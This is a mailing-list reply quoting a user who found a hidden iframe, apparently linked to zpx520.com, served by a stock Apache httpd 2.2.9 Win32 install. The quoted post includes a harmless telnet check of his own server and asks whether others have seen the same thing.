Re: zpx520.com hidden iframe in stock Win32 install?

Greg Mortensen wrote:
Hi, list.

I need a quick sanity check. I have a stock 2.2.9 httpd (Win32 Binary including OpenSSL 0.9.8h (MSI Installer)) install on my Windows XP box. I just got the binary from the veritris.com mirror. The MD5 signature checks out fine.

Everything looked OK while connecting to localhost, but I noticed a funny 0x0 "blip" in the left-hand corner when viewing it remotely. I decided to connect to it by hand, and I found a hidden iframe element that's not in the index.html file:

$ telnet 192.168.8.150 80
Trying 192.168.8.150...
Connected to 192.168.8.150.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.1 200 OK

I tried it on another XP machine, and I got the same result. Before I try to narrow this down to httpd / my machines / myself, I'd like to ask if anyone else has seen this? A virus and spyware scan came up OK on both machines.

Doesn't sound right to me... I've certainly never noticed it on win32 installs, though I don't have an environment to test it myself just now